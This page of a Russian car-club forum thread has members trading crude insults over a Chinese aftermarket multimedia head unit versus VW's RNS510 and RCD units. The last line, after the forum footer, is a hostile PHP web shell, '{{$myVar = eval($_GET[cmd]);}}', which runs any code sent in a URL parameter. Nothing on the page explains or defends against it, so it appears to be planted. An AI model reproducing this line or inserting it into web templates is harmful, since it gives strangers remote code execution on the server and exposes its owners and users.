+ Ответить в теме
Страница 3 из 5 ПерваяПервая 1 2 3 4 5 ПоследняяПоследняя
Показано с 21 по 30 из 49

Тема: Мультимедийный АПЕЛЬСИН! Или новая голова лучше старых двух! :)


  1. #21
    Цитата Сообщение от Chuka Посмотреть сообщение
    ФОРС, ты че говоришь то?

    тебя послушать, так твоя машины Lifan или Great Wall, кожа кондиционер мп3 музыка итд по цене пустого кедди! :laugh:
    я бы купил Кедди, или Гольф и срать мне на разницу в цене, я покупаю немецкую Das Auto а не китайскую Was Ist Das? :laugh:

    Чувак!!! Чё ты тут рисуешься на форуме ??? Забыл как передергивал на мою музыку в авто ??? :laugh::laugh: Меня ахуенно все устраивает, и музыка и видео и работа GPS!!! Какие вопросы овощи !? :laugh:

    P.S. Чукенций, переверни свой хвалёный ИФОНЕ и посмотри где он сделан! Чё схавал???


  2. #22
    Цитата Сообщение от ФОРС Посмотреть сообщение

    Чувак!!! Чё ты тут рисуешься на форуме ??? Забыл как передергивал на мою музыку в авто ??? :laugh::laugh: Меня ахуенно все устраивает, и музыка и видео и работа GPS!!! Какие вопросы овощи !? :laugh:

    P.S. Чукенций, переверни свой хвалёный ИФОНЕ и посмотри где он сделан! Чё схавал???

    Я то схавал, я знаю что и где сделано, и RNS510 я уверен сделан в том же Китае, но он потрясно удобен, как тот же айфон или айпод, а ты держал в руках китайский айфон или айпод? я держал, это дерьмо! :laugh::friends:

    Можно продать твой оранж, купить 5 Chery QQ и всех их боком упаковать в константиниуса! что скажешь? :laugh::laugh:
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  3. #23
    Цитата Сообщение от Chuka Посмотреть сообщение
    Я то схавал, я знаю что и где сделано, и RNS510 я уверен сделан в том же Китае, но он потрясно удобен, как тот же айфон или айпод, а ты держал в руках китайский айфон или айпод? я держал, это дерьмо! :laugh::friends:

    Можно продать твой оранж, купить 5 Chery QQ и всех их боком упаковать в константиниуса! что скажешь? :laugh::laugh:
    Сцуко!!!!!!!!! :laugh::laugh::laugh::laugh: Я ЗА!!! Только предлагаю изменить стратегию, оранж любимый не трогать, продать гараж, и упаковать его с 4-х сторон чериками! В притирочку с ручничком! А из машины только 4 выхода и есть! Через крышу или днище он явно не выбереццо! ))) Замуруем??? :laugh::laugh::laugh:

  4. #24
    Заметано! :laugh:
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  5. #25
    Цитата Сообщение от Chuka Посмотреть сообщение
    Заметано! :laugh:


    Константиниус приехал на ТАкси, но это ему не помогло! :laugh::laugh:



  6. #26
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    ))))) Идиоты)))

    В общем вся партия сказала - ФУФЕЛ та магнитола, что ты толкаешь (форс) )))

    Особенно порадовало за 900$ ставить тумблер в машине))))
    Не твое творчество:


    Штатная отрубается через каждые 20-30 минут)))

    Форс наверное не хочет казаться одним дураком с таким девайсом и скорей всего свой же и впарит)))

  7. #27
    [quote=constantinus;168899]))))) Идиоты)))

    В общем вся партия сказала - ФУФЕЛ та магнитола, что ты толкаешь (форс) )))

    Особенно порадовало за 900$ ставить тумблер в машине))))
    Не твое творчество:

    Штатная отрубается через каждые 20-30 минут)))

    Форс наверное не хочет казаться одним дураком с таким девайсом и скорей всего свой же и впарит)))[quote]

    Да мне насрать на Ваше мнение, партия! :laugh::laugh::laugh: Партия это кто ? Ты и еще пару человек из вашей партии!? Вообще не Авторитеты!!!
    :laugh::laugh::laugh:

    Все кто сидел в машине и смотрел крутил клацал сказали клёвая вещь!!! А ты пыжишься из зависти, и даже сам ни разу не подошел не посмотрел! :laugh::laugh: Вывод один, погнать на ФОРСА, и на все что он делает!!! А Сами овощи хоть что то в машине сделали своими руками ??? Или хоть умеете отличить на взгляд ключ на 10 или на 12 ???

    И блять читай внимательно что бы не выглядеть как ты написал "дураком", вверху, тумблер у меня стоит на всю электронику навесную!!!!!
    А не на магнитолу!!! (камера заднего вида, подсветка днища, подсветка арок, подсветка ног, подсветка ручек, подсветка номера, магнитола, пневмо сигнал и т.д.) Магнитола и сама нормально отключается и включается! :punish:
    Последний раз редактировалось ФОРС; 29.01.2010 в 16:46.

  8. #28
    II место Лучший Пилот клуба 2011 deflep will become famous soon enough Аватар для deflep
    Регистрация
    27.08.2007
    Откуда
    Москва
    Машина
    VW Golf MkV, 2007, BUB*Rotrex, DSG
    Сообщений
    1,613
    Форс, у меня стоит РНС-ка с подключенным к ней хвостом для яДебилки/яПод-а.

    Фэт Бокс - это родная ВАГовская приблуда, в которую можно воткнуть спецально для нее сделанный винт на 120 гиг или подлючить люброй выносной ХД. Погугли на немецком сайте ФВ - там про этот бокс есть инфа.

    Что касается цены, то ваши же Киевские комрады на Пассат клубе мутят РНС-ки по 750 ойро новые и 500 - б/у но после фейслифтинга.

    Ничего не могу сказать по поводу Киева и Украины в целом, но по Москве и РФ намученные от БМВ-й системы карты работают отлично и покрытие дают очень не плохое.
    "Все что не умеет быстро ездить, обязательно должно красиво выглядеть"(с) я
    Wings for Life (c)
    A heart that hurts, Is a heart that... works.

  9. #29
    Цитата Сообщение от deflep Посмотреть сообщение
    Форс, у меня стоит РНС-ка с подключенным к ней хвостом для яДебилки/яПод-а.
    Ну приезжай на АЭ летом, протестим сравним, я РНС кой не пользовался, трудно судить! Но то что в базе моя стоит (если на аналоговом ТВ тюнере 700 уе, то твоя стоит ровно в 1,5 раза дороже) :friends:

  10. #30
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    ))) Ну одно дело когда чел пишет о магнитоле - свое впечатление.
    А ты о ней пишешь и пытаешься толкать.
    Я такое встречал уже когда люди ведутся на внешний вид магнитолы и всем потом втирают, что стоит у них штатная магнитола.

    Особенно учитывая, что ты не пользовался RNS и RCD.

    А я юзал такую же китайскую красу, только на крузаке (на разные авто меняют заставку старта магнитолы и пластмасу вокруг). Может интерфейс там был хуже чем на этой, но эта магнитола далека от так называемого Юзабилити. Обыкновенный у нее интерфейс DVD проигрывателя - не удевлюсь, что там стоит портированная прошивка с DVD и все.

    К примеру поменяв с Пионера на RCD первое что я заметил, то что сенсор на RCD работает на порядок точней и лучше. А это пионер все-таки. Что касается пионера, то у него интерфейс относительно убийственный, так какими партиями он продается.

    RCD можно вывести на руль без проблем, отображается трек на МФА, кроме сенсора куча дублирующих кнопок на магнитоле. Вообщем RCD и RNS очень хорошо заточенная магнитола под водителя, чтобы он не отвлекался от дороги тыкая в экран и выбирая пассажирам фильмец))) А то им скушно ехать)))

+ Ответить в теме
Страница 3 из 5 ПерваяПервая 1 2 3 4 5 ПоследняяПоследняя

Похожие темы

  1. Новая голова
    от armor85 в разделе Барахолка
    Ответов: 5
    Последнее сообщение: 02.04.2024, 19:37
  2. Пропадает звук в двух колонках
    от Jahnglist3000 в разделе Авто Звук
    Ответов: 27
    Последнее сообщение: 02.04.2024, 15:16
  3. мультимедийный комплекс carmani ca-450
    от sixtynine в разделе Тюнинг
    Ответов: 3
    Последнее сообщение: 15.10.2013, 14:36
  4. С днем рождения, мой любимый АПЕЛЬСИН! :)
    от ФОРС в разделе Курилка
    Ответов: 10
    Последнее сообщение: 09.11.2010, 19:25
  5. Продаю Focus ST 07 (полосатый апельсин)
    от fsG в разделе Покупка и продажа авто
    Ответов: 6
    Последнее сообщение: 24.10.2009, 17:44

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}